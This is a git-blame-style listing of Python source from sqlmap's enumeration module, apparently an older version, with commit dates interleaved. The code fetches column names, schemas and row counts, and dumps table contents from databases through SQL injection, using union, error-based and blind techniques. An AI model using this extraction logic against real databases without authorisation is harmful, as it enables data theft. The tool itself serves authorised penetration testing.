warnMsg += "table(s) columns"
|
|
|
|
logger.warn(warnMsg)
|
2010-12-30 11:29:20 +03:00
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
conf.db = self.getCurrentDb()
|
2010-12-30 11:29:20 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
elif conf.db is not None:
|
2011-05-06 14:27:43 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
2011-05-01 02:10:27 +04:00
|
|
|
conf.db = conf.db.upper()
|
2011-04-30 01:17:59 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
if ',' in conf.db:
|
|
|
|
errMsg = "only one database name is allowed when enumerating "
|
|
|
|
errMsg += "the tables' columns"
|
|
|
|
raise sqlmapMissingMandatoryOptionException, errMsg
|
2011-04-30 01:17:59 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
conf.db = safeSQLIdentificatorNaming(conf.db)
|
2011-04-30 01:17:59 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
if conf.col:
|
2011-05-06 14:27:43 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
2011-05-01 02:10:27 +04:00
|
|
|
conf.col = conf.col.upper()
|
|
|
|
|
|
|
|
colList = conf.col.split(",")
|
|
|
|
else:
|
|
|
|
colList = []
|
|
|
|
|
|
|
|
for col in colList:
|
|
|
|
colList[colList.index(col)] = safeSQLIdentificatorNaming(col)
|
|
|
|
|
|
|
|
if conf.tbl:
|
2011-05-06 14:27:43 +04:00
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
2011-05-01 02:10:27 +04:00
|
|
|
conf.tbl = conf.tbl.upper()
|
|
|
|
|
|
|
|
tblList = conf.tbl.split(",")
|
|
|
|
else:
|
|
|
|
self.getTables()
|
|
|
|
|
|
|
|
if len(kb.data.cachedTables) > 0:
|
|
|
|
tblList = kb.data.cachedTables.values()
|
|
|
|
|
|
|
|
if isinstance(tblList[0], (set, tuple, list)):
|
|
|
|
tblList = tblList[0]
|
|
|
|
else:
|
|
|
|
errMsg = "unable to retrieve the tables"
|
|
|
|
errMsg += "on database '%s'" % conf.db
|
|
|
|
raise sqlmapNoneDataException, errMsg
|
2011-04-30 01:17:59 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
for tbl in tblList:
|
2011-05-08 06:08:18 +04:00
|
|
|
tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)
|
2011-05-01 02:10:27 +04:00
|
|
|
|
|
|
|
bruteForce = False
|
2011-04-30 01:17:59 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "information_schema not available, "
|
2008-10-15 19:38:22 +04:00
|
|
|
errMsg += "back-end DBMS is MySQL < 5.0"
|
2010-11-11 20:09:31 +03:00
|
|
|
logger.error(errMsg)
|
|
|
|
bruteForce = True
|
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.ACCESS):
|
2011-04-30 17:20:05 +04:00
|
|
|
errMsg = "cannot retrieve column names, "
|
2010-11-11 20:09:31 +03:00
|
|
|
errMsg += "back-end DBMS is Access"
|
|
|
|
logger.error(errMsg)
|
|
|
|
bruteForce = True
|
|
|
|
|
|
|
|
if bruteForce:
|
2010-12-27 17:17:20 +03:00
|
|
|
resumeAvailable = False
|
2011-01-12 00:46:21 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
for tbl in tblList:
|
|
|
|
for db, table, colName, colType in kb.brute.columns:
|
|
|
|
if db == conf.db and table == tbl:
|
|
|
|
resumeAvailable = True
|
|
|
|
break
|
2010-12-27 17:17:20 +03:00
|
|
|
|
2011-05-31 03:34:48 +04:00
|
|
|
if resumeAvailable or colList:
|
2010-12-27 17:17:20 +03:00
|
|
|
columns = {}
|
|
|
|
|
2011-05-31 03:34:48 +04:00
|
|
|
for column in colList:
|
|
|
|
columns[column] = None
|
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
for tbl in tblList:
|
|
|
|
for db, table, colName, colType in kb.brute.columns:
|
|
|
|
if db == conf.db and table == tbl:
|
|
|
|
columns[colName] = colType
|
|
|
|
|
|
|
|
if conf.db in kb.data.cachedColumns:
|
2011-05-08 06:08:18 +04:00
|
|
|
kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)][unsafeSQLIdentificatorNaming(tbl)] = columns
|
2011-05-01 02:10:27 +04:00
|
|
|
else:
|
2011-05-08 06:08:18 +04:00
|
|
|
kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)] = {unsafeSQLIdentificatorNaming(tbl): columns}
|
2011-01-12 00:46:21 +03:00
|
|
|
|
2010-12-27 17:17:20 +03:00
|
|
|
return kb.data.cachedColumns
|
|
|
|
|
2011-05-22 12:24:13 +04:00
|
|
|
message = "do you want to use common columns existence check? [Y/n/q]"
|
2010-11-11 20:09:31 +03:00
|
|
|
test = readInput(message, default="Y")
|
|
|
|
|
|
|
|
if test[0] in ("n", "N"):
|
|
|
|
return
|
|
|
|
elif test[0] in ("q", "Q"):
|
|
|
|
raise sqlmapUserQuitException
|
|
|
|
else:
|
|
|
|
return columnExists(paths.COMMON_COLUMNS)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
rootQuery = queries[Backend.getIdentifiedDbms()].columns
|
2010-12-12 17:38:07 +03:00
|
|
|
condition = rootQuery.blind.condition if 'condition' in rootQuery.blind else None
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2011-01-19 02:02:11 +03:00
|
|
|
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) or conf.direct:
|
2011-05-01 02:10:27 +04:00
|
|
|
for tbl in tblList:
|
|
|
|
if conf.db is not None and len(kb.data.cachedColumns) > 0 \
|
|
|
|
and conf.db in kb.data.cachedColumns and tbl in \
|
|
|
|
kb.data.cachedColumns[conf.db]:
|
|
|
|
infoMsg = "fetched tables' columns on "
|
|
|
|
infoMsg += "database '%s'" % conf.db
|
|
|
|
logger.info(infoMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
return { conf.db: kb.data.cachedColumns[conf.db]}
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
infoMsg = "fetching columns "
|
2010-09-01 13:25:21 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
if len(colList) > 0:
|
2011-06-08 20:39:41 +04:00
|
|
|
colConsider, colCondParam = self.likeOrExact("column")
|
|
|
|
condQueryStr = "%%s%s" % colCondParam
|
|
|
|
condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in colList)
|
2011-05-19 21:35:33 +04:00
|
|
|
|
2011-06-08 20:39:41 +04:00
|
|
|
if colConsider == "1":
|
2011-05-19 21:35:33 +04:00
|
|
|
infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in colList)
|
|
|
|
else:
|
|
|
|
infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in colList)
|
2011-05-01 02:10:27 +04:00
|
|
|
else:
|
|
|
|
condQuery = ""
|
2011-03-26 00:46:49 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
infoMsg += "for table '%s' " % tbl
|
|
|
|
infoMsg += "on database '%s'" % conf.db
|
|
|
|
logger.info(infoMsg)
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
|
|
|
|
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
|
|
|
|
query += condQuery
|
|
|
|
elif Backend.isDbms(DBMS.ORACLE):
|
|
|
|
query = rootQuery.inband.query % unsafeSQLIdentificatorNaming(tbl.upper())
|
|
|
|
query += condQuery
|
|
|
|
elif Backend.isDbms(DBMS.MSSQL):
|
|
|
|
query = rootQuery.inband.query % (conf.db, conf.db,
|
|
|
|
conf.db, conf.db,
|
|
|
|
conf.db, conf.db,
|
|
|
|
conf.db, unsafeSQLIdentificatorNaming(tbl))
|
|
|
|
query += condQuery.replace("[DB]", conf.db)
|
|
|
|
elif Backend.isDbms(DBMS.SQLITE):
|
|
|
|
query = rootQuery.inband.query % tbl
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
value = inject.getValue(query, blind=False)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
if Backend.isDbms(DBMS.SQLITE):
|
|
|
|
parseSqliteTableSchema(value)
|
2011-05-26 12:17:21 +04:00
|
|
|
elif not isNoneValue(value):
|
2011-05-01 02:10:27 +04:00
|
|
|
table = {}
|
|
|
|
columns = {}
|
2011-02-19 17:56:58 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
for columnData in value:
|
2011-05-26 12:17:21 +04:00
|
|
|
if not isNoneValue(columnData):
|
2011-05-01 02:10:27 +04:00
|
|
|
name = safeSQLIdentificatorNaming(columnData[0])
|
2011-02-19 17:56:58 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
if len(columnData) == 1:
|
|
|
|
columns[name] = ""
|
|
|
|
else:
|
|
|
|
columns[name] = columnData[1]
|
2011-02-19 17:56:58 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
if conf.db in kb.data.cachedColumns:
|
2011-05-08 06:08:18 +04:00
|
|
|
kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)][unsafeSQLIdentificatorNaming(tbl)] = columns
|
2011-05-01 02:10:27 +04:00
|
|
|
else:
|
2011-05-08 06:08:18 +04:00
|
|
|
table[unsafeSQLIdentificatorNaming(tbl)] = columns
|
|
|
|
kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)] = table
|
2011-02-19 17:56:58 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
if not kb.data.cachedColumns and not conf.direct:
|
|
|
|
for tbl in tblList:
|
|
|
|
if conf.db is not None and len(kb.data.cachedColumns) > 0 \
|
|
|
|
and conf.db in kb.data.cachedColumns and tbl in \
|
|
|
|
kb.data.cachedColumns[conf.db]:
|
|
|
|
infoMsg = "fetched tables' columns on "
|
|
|
|
infoMsg += "database '%s'" % conf.db
|
|
|
|
logger.info(infoMsg)
|
2011-02-19 17:56:58 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
return { conf.db: kb.data.cachedColumns[conf.db]}
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
infoMsg = "fetching columns "
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
if len(colList) > 0:
|
|
|
|
condQuery = " AND (%s)" % " OR ".join("%s LIKE '%%%s%%'" % (condition, unsafeSQLIdentificatorNaming(col)) for col in colList)
|
|
|
|
likeMsg = "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in colList)
|
|
|
|
infoMsg += likeMsg
|
|
|
|
else:
|
|
|
|
condQuery = ""
|
|
|
|
likeMsg = ""
|
2010-01-09 03:05:00 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
infoMsg += "for table '%s' " % tbl
|
|
|
|
infoMsg += "on database '%s'" % conf.db
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
countMsg = "fetching number of columns %s" % likeMsg
|
|
|
|
countMsg += "for table '%s'" % tbl
|
|
|
|
countMsg += " on database '%s'" % conf.db
|
|
|
|
logger.info(countMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-01-28 19:36:09 +03:00
|
|
|
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
|
2011-05-01 02:10:27 +04:00
|
|
|
query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
|
2010-01-10 03:21:03 +03:00
|
|
|
query += condQuery
|
2011-05-01 02:10:27 +04:00
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
elif Backend.isDbms(DBMS.ORACLE):
|
2011-05-01 02:10:27 +04:00
|
|
|
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(tbl.upper())
|
2010-01-10 03:21:03 +03:00
|
|
|
query += condQuery
|
2011-05-01 02:10:27 +04:00
|
|
|
|
|
|
|
elif Backend.getIdentifiedDbms() in DBMS.MSSQL:
|
|
|
|
query = rootQuery.blind.count % (conf.db, conf.db, \
|
|
|
|
unsafeSQLIdentificatorNaming(tbl))
|
2010-01-10 03:21:03 +03:00
|
|
|
query += condQuery.replace("[DB]", conf.db)
|
2011-05-01 02:10:27 +04:00
|
|
|
|
2011-04-30 18:54:29 +04:00
|
|
|
elif Backend.isDbms(DBMS.FIREBIRD):
|
2011-05-01 02:10:27 +04:00
|
|
|
query = rootQuery.blind.count % (tbl)
|
2010-03-18 20:20:54 +03:00
|
|
|
query += condQuery
|
2010-01-10 03:21:03 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
elif Backend.isDbms(DBMS.SQLITE):
|
|
|
|
query = rootQuery.blind.query % tbl
|
|
|
|
value = inject.getValue(query, inband=False, error=False)
|
|
|
|
parseSqliteTableSchema(value)
|
|
|
|
return kb.data.cachedColumns
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=2)
|
|
|
|
|
|
|
|
if not isNumPosStrValue(count):
|
|
|
|
errMsg = "unable to retrieve the number of columns "
|
|
|
|
errMsg += "for table '%s' " % tbl
|
|
|
|
errMsg += "on database '%s'" % conf.db
|
2011-05-01 03:20:16 +04:00
|
|
|
logger.error(errMsg)
|
|
|
|
|
|
|
|
continue
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
table = {}
|
|
|
|
columns = {}
|
2010-03-18 20:20:54 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
indexRange = getRange(count)
|
2010-03-18 20:20:54 +03:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
for index in indexRange:
|
|
|
|
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
|
|
|
|
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
|
|
|
|
query += condQuery
|
|
|
|
field = None
|
2011-05-06 14:27:43 +04:00
|
|
|
elif Backend.isDbms(DBMS.ORACLE):
|
2011-05-01 02:10:27 +04:00
|
|
|
query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl.upper())
|
|
|
|
query += condQuery
|
|
|
|
field = None
|
|
|
|
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
|
|
|
query = rootQuery.blind.query % (conf.db, conf.db,
|
|
|
|
conf.db, conf.db,
|
|
|
|
conf.db, conf.db,
|
|
|
|
unsafeSQLIdentificatorNaming(tbl))
|
|
|
|
query += condQuery.replace("[DB]", conf.db)
|
|
|
|
field = condition.replace("[DB]", conf.db)
|
|
|
|
elif Backend.isDbms(DBMS.FIREBIRD):
|
|
|
|
query = rootQuery.blind.query % (tbl)
|
|
|
|
query += condQuery
|
|
|
|
field = None
|
|
|
|
|
|
|
|
query = agent.limitQuery(index, query, field)
|
|
|
|
column = inject.getValue(query, inband=False, error=False)
|
|
|
|
|
|
|
|
if not onlyColNames:
|
|
|
|
if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
|
|
|
|
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db))
|
2011-05-06 14:27:43 +04:00
|
|
|
elif Backend.isDbms(DBMS.ORACLE):
|
2011-05-01 02:10:27 +04:00
|
|
|
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column)
|
|
|
|
elif Backend.isDbms(DBMS.MSSQL):
|
|
|
|
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db,
|
|
|
|
conf.db, column, conf.db,
|
|
|
|
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl))
|
|
|
|
elif Backend.isDbms(DBMS.FIREBIRD):
|
|
|
|
query = rootQuery.blind.query2 % (tbl, column)
|
|
|
|
|
|
|
|
colType = inject.getValue(query, inband=False, error=False)
|
|
|
|
|
|
|
|
if Backend.isDbms(DBMS.FIREBIRD):
|
|
|
|
colType = firebirdTypes[colType] if colType in firebirdTypes else colType
|
|
|
|
|
|
|
|
column = safeSQLIdentificatorNaming(column)
|
|
|
|
columns[column] = colType
|
|
|
|
else:
|
|
|
|
column = safeSQLIdentificatorNaming(column)
|
|
|
|
columns[column] = None
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
if columns:
|
|
|
|
if conf.db in kb.data.cachedColumns:
|
2011-05-08 06:08:18 +04:00
|
|
|
kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)][unsafeSQLIdentificatorNaming(tbl)] = columns
|
2011-05-01 02:10:27 +04:00
|
|
|
else:
|
2011-05-08 06:08:18 +04:00
|
|
|
table[unsafeSQLIdentificatorNaming(tbl)] = columns
|
|
|
|
kb.data.cachedColumns[unsafeSQLIdentificatorNaming(conf.db)] = table
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
if not kb.data.cachedColumns:
|
2011-05-01 02:10:27 +04:00
|
|
|
errMsg = "unable to retrieve the columns for any "
|
|
|
|
errMsg += "table on database '%s'" % conf.db
|
2011-05-01 03:20:16 +04:00
|
|
|
logger.error(errMsg)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
return kb.data.cachedColumns
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2011-04-30 02:37:43 +04:00
|
|
|
def getSchema(self):
|
|
|
|
infoMsg = "enumerating database management system schema"
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
pushValue(conf.db)
|
|
|
|
pushValue(conf.tbl)
|
2011-05-01 02:10:27 +04:00
|
|
|
pushValue(conf.col)
|
2011-04-30 02:37:43 +04:00
|
|
|
|
|
|
|
conf.db = None
|
|
|
|
conf.tbl = None
|
2011-05-01 02:10:27 +04:00
|
|
|
conf.col = None
|
|
|
|
kb.data.cachedTables = {}
|
|
|
|
kb.data.cachedColumns = {}
|
2011-04-30 02:37:43 +04:00
|
|
|
|
|
|
|
self.getTables()
|
|
|
|
|
|
|
|
infoMsg = "fetched tables: "
|
2011-05-26 18:30:05 +04:00
|
|
|
infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if \
|
2011-04-30 02:37:43 +04:00
|
|
|
Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \
|
2011-05-26 18:30:05 +04:00
|
|
|
else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \
|
2011-04-30 02:37:43 +04:00
|
|
|
kb.data.cachedTables.items()])
|
|
|
|
logger.info(infoMsg)
|
|
|
|
|
|
|
|
for db, tables in kb.data.cachedTables.items():
|
|
|
|
for tbl in tables:
|
|
|
|
conf.db = db
|
|
|
|
conf.tbl = tbl
|
|
|
|
|
|
|
|
self.getColumns()
|
|
|
|
|
2011-05-01 02:10:27 +04:00
|
|
|
conf.col = popValue()
|
2011-04-30 02:37:43 +04:00
|
|
|
conf.tbl = popValue()
|
|
|
|
conf.db = popValue()
|
|
|
|
|
|
|
|
return kb.data.cachedColumns
|
|
|
|
|
2011-04-30 04:22:22 +04:00
|
|
|
def __tableGetCount(self, db, table):
|
|
|
|
query = "SELECT COUNT(*) FROM %s.%s" % (safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(table, True))
|
|
|
|
count = inject.getValue(query, expected=EXPECTED.INT, charsetType=2)
|
|
|
|
|
|
|
|
if count is not None and isinstance(count, basestring) and count.isdigit():
|
|
|
|
if unsafeSQLIdentificatorNaming(db) not in kb.data.cachedCounts:
|
|
|
|
kb.data.cachedCounts[unsafeSQLIdentificatorNaming(db)] = {}
|
|
|
|
|
|
|
|
if int(count) in kb.data.cachedCounts[unsafeSQLIdentificatorNaming(db)]:
|
|
|
|
kb.data.cachedCounts[unsafeSQLIdentificatorNaming(db)][int(count)].append(unsafeSQLIdentificatorNaming(table))
|
|
|
|
else:
|
|
|
|
kb.data.cachedCounts[unsafeSQLIdentificatorNaming(db)][int(count)] = [unsafeSQLIdentificatorNaming(table)]
|
|
|
|
|
|
|
|
def getCount(self):
|
|
|
|
if not conf.tbl:
|
|
|
|
warnMsg = "missing table parameter, sqlmap will retrieve "
|
|
|
|
warnMsg += "the number of entries for all database "
|
|
|
|
warnMsg += "management system databases' tables"
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
elif "." in conf.tbl:
|
|
|
|
if not conf.db:
|
|
|
|
conf.db, conf.tbl = conf.tbl.split(".")
|
|
|
|
|
|
|
|
if conf.tbl is not None and conf.db is None:
|
|
|
|
warnMsg = "missing database parameter, sqlmap is going to "
|
|
|
|
warnMsg += "use the current database to retrieve the "
|
|
|
|
warnMsg += "number of entries for table '%s'" % conf.tbl
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
conf.db = self.getCurrentDb()
|
2011-04-30 04:22:22 +04:00
|
|
|
|
|
|
|
self.forceDbmsEnum()
|
|
|
|
|
|
|
|
if conf.tbl:
|
|
|
|
for table in conf.tbl.split(","):
|
|
|
|
self.__tableGetCount(conf.db, table)
|
|
|
|
else:
|
|
|
|
self.getTables()
|
|
|
|
|
|
|
|
for db, tables in kb.data.cachedTables.items():
|
|
|
|
for table in tables:
|
|
|
|
self.__tableGetCount(db, table)
|
|
|
|
|
|
|
|
return kb.data.cachedCounts
|
|
|
|
|
2011-02-19 17:56:58 +03:00
|
|
|
def __pivotDumpTable(self, table, colList, count=None, blind=True):
|
2011-02-19 03:36:47 +03:00
|
|
|
lengths = {}
|
|
|
|
entries = {}
|
|
|
|
|
2011-02-19 17:56:58 +03:00
|
|
|
dumpNode = queries[Backend.getIdentifiedDbms()].dump_table.blind
|
|
|
|
|
2011-02-19 03:36:47 +03:00
|
|
|
validColumnList = False
|
|
|
|
validPivotValue = False
|
|
|
|
|
2011-02-19 17:56:58 +03:00
|
|
|
if not count:
|
|
|
|
query = dumpNode.count % table
|
|
|
|
if blind:
|
|
|
|
count = inject.getValue(query, inband=False, error=False)
|
|
|
|
else:
|
|
|
|
count = inject.getValue(query, blind=False)
|
|
|
|
|
2011-05-23 23:16:29 +04:00
|
|
|
if count == "0":
|
|
|
|
infoMsg = "table '%s' appears to be empty" % table
|
2011-04-15 01:11:20 +04:00
|
|
|
logger.info(infoMsg)
|
2011-05-23 23:16:29 +04:00
|
|
|
|
|
|
|
for column in colList:
|
|
|
|
lengths[column] = len(column)
|
|
|
|
entries[column] = []
|
|
|
|
|
|
|
|
return entries, lengths
|
|
|
|
elif not count:
|
|
|
|
return None
|
2011-04-15 01:11:20 +04:00
|
|
|
|
2011-04-29 18:33:47 +04:00
|
|
|
for column in colList:
|
|
|
|
lengths[column] = 0
|
|
|
|
entries[column] = []
|
|
|
|
|
2011-04-11 15:59:02 +04:00
|
|
|
colList = sorted(colList, key=lambda x: len(x) if x else MAX_INT)
|
2011-04-11 13:40:52 +04:00
|
|
|
|
2011-02-19 12:40:41 +03:00
|
|
|
for column in colList:
|
|
|
|
infoMsg = "fetching number of distinct "
|
|
|
|
infoMsg += "values for column '%s'" % column
|
|
|
|
logger.info(infoMsg)
|
2011-02-19 03:36:47 +03:00
|
|
|
|
2011-02-19 12:40:41 +03:00
|
|
|
query = dumpNode.count2 % (column, table)
|
2011-03-23 14:36:40 +03:00
|
|
|
|
2011-02-19 12:40:41 +03:00
|
|
|
if blind:
|
|
|
|
value = inject.getValue(query, inband=False, error=False)
|
|
|
|
else:
|
|
|
|
value = inject.getValue(query, blind=False)
|
2011-02-19 03:36:47 +03:00
|
|
|
|
2011-02-19 12:40:41 +03:00
|
|
|
if isNumPosStrValue(value):
|
|
|
|
validColumnList = True
|
2011-04-29 18:33:47 +04:00
|
|
|
|
2011-02-19 12:40:41 +03:00
|
|
|
if value == count:
|
|
|
|
infoMsg = "using column '%s' as a pivot " % column
|
|
|
|
infoMsg += "for retrieving row data"
|
|
|
|
logger.info(infoMsg)
|
2011-02-19 03:36:47 +03:00
|
|
|
|
2011-02-19 12:40:41 +03:00
|
|
|
validPivotValue = True
|
2011-02-19 03:36:47 +03:00
|
|
|
|
2011-02-19 12:40:41 +03:00
|
|
|
colList.remove(column)
|
|
|
|
colList.insert(0, column)
|
|
|
|
break
|
2011-02-19 03:36:47 +03:00
|
|
|
|
|
|
|
if not validColumnList:
|
|
|
|
errMsg = "all column name(s) provided are non-existent"
|
|
|
|
raise sqlmapNoneDataException, errMsg
|
|
|
|
|
|
|
|
if not validPivotValue:
|
|
|
|
warnMsg = "no proper pivot column provided (with unique values)."
|
|
|
|
warnMsg += " all rows can't be retrieved."
|
|
|
|
logger.warn(warnMsg)
|
|
|
|
|
|
|
|
pivotValue = " "
|
|
|
|
breakRetrieval = False
|
|
|
|
|
2011-04-15 18:21:13 +04:00
|
|
|
try:
|
|
|
|
for i in xrange(int(count)):
|
|
|
|
if breakRetrieval:
|
|
|
|
break
|
2011-02-19 03:36:47 +03:00
|
|
|
|
2011-04-15 18:21:13 +04:00
|
|
|
for column in colList:
|
|
|
|
if column == colList[0]:
|
|
|
|
# Correction for pivotValues with unrecognized chars
|
|
|
|
if pivotValue and '?' in pivotValue and pivotValue[0] != '?':
|
|
|
|
pivotValue = pivotValue.split('?')[0]
|
|
|
|
pivotValue = pivotValue[:-1] + chr(ord(pivotValue[-1]) + 1)
|
|
|
|
query = dumpNode.query % (column, table, column, pivotValue)
|
|
|
|
else:
|
|
|
|
query = dumpNode.query2 % (column, table, colList[0], pivotValue)
|
|
|
|
|
|
|
|
if blind:
|
|
|
|
value = inject.getValue(query, inband=False, error=False)
|
2011-02-19 03:36:47 +03:00
|
|
|
else:
|
2011-04-15 18:21:13 +04:00
|
|
|
value = inject.getValue(query, blind=False)
|
|
|
|
|
|
|
|
if column == colList[0]:
|
2011-06-06 13:55:22 +04:00
|
|
|
if isNoneValue(value):
|
2011-04-15 18:21:13 +04:00
|
|
|
breakRetrieval = True
|
|
|
|
break
|
|
|
|
else:
|
|
|
|
pivotValue = safechardecode(value)
|
|
|
|
|
2011-05-26 19:16:57 +04:00
|
|
|
if all([conf.limitStart, conf.limitStop]):
|
|
|
|
if (i + 1) < conf.limitStart:
|
2011-05-26 19:23:28 +04:00
|
|
|
warnMsg = "skipping first %d pivot " % conf.limitStart
|
|
|
|
warnMsg += "point values"
|
2011-06-08 18:35:23 +04:00
|
|
|
singleTimeWarnMessage(warnMsg)
|
2011-05-26 19:16:57 +04:00
|
|
|
break
|
|
|
|
elif (i + 1) > conf.limitStop:
|
|
|
|
breakRetrieval = True
|
|
|
|
break
|
|
|
|
|
2011-04-15 18:21:13 +04:00
|
|
|
lengths[column] = max(lengths[column], len(value) if value else 0)
|
|
|
|
entries[column].append(value)
|
|
|
|
|
|
|
|
except KeyboardInterrupt:
|
|
|
|
warnMsg = "user aborted during enumeration. sqlmap "
|
|
|
|
warnMsg += "will display partial output"
|
|
|
|
logger.warn(warnMsg)
|
2011-02-19 03:36:47 +03:00
|
|
|
|
2011-04-15 18:21:13 +04:00
|
|
|
except sqlmapConnectionException, e:
|
|
|
|
errMsg = "connection exception detected. sqlmap "
|
|
|
|
errMsg += "will display partial output"
|
|
|
|
errMsg += "'%s'" % e
|
|
|
|
logger.critical(errMsg)
|
2011-02-19 03:36:47 +03:00
|
|
|
|
2011-02-19 12:36:57 +03:00
|
|
|
return entries, lengths
|
|
|
|
|
2010-05-07 17:40:57 +04:00
|
|
|
def dumpTable(self):
|
|
|
|
self.forceDbmsEnum()
|
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if conf.db is None or conf.db == "CD":
|
|
|
|
if conf.db is None:
|
|
|
|
warnMsg = "missing database parameter, sqlmap is going "
|
|
|
|
warnMsg += "to use the current database to enumerate "
|
|
|
|
warnMsg += "table(s) entries"
|
|
|
|
logger.warn(warnMsg)
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-06 14:27:43 +04:00
|
|
|
conf.db = self.getCurrentDb()
|
2010-05-07 17:40:57 +04:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
elif conf.db is not None:
|
|
|
|
if Backend.isDbms(DBMS.ORACLE):
|
|
|
|
conf.db = conf.db.upper()
|
2011-01-02 14:01:20 +03:00
|
|
|
|
2011-05-08 06:08:18 +04:00
|
|
|
if ',' in conf.db:
|
|
|
|
errMsg = "only one database name is allowed when enumerating "
|
|
|
|
errMsg += "the tables' columns"
|
|
|
|
raise sqlmapMissingMandatoryOptionException, errMsg
|
2010-05-07 17:40:57 +04:00
|
|
|
|
